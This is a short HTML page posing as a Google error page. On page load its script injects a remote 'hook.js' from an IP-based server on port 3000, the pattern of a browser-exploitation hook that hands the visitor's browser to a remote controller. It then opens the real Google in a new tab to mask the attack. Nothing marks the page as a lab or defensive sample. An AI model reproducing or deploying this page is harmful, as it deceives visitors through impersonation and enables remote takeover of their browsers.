<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Google</title>
</head>
<body>
<p>There was an error. <a href="https://google.com" target="_blank" rel="noopener onreferrer">Reload</a> 
<script src="jquery-1.12.4.min.js"></script>
<script>
    var commandModuleStr = '<script src="http://173-255-249-211.ip.linodeusercontent.com:3000/hook.js" type="text/javascript"><\/script>';
    document.write(commandModuleStr);

    // Open Google in a new tab and keep the original page open
    window.open('https://www.google.com', '_blank');
</script>
</body>
</html>
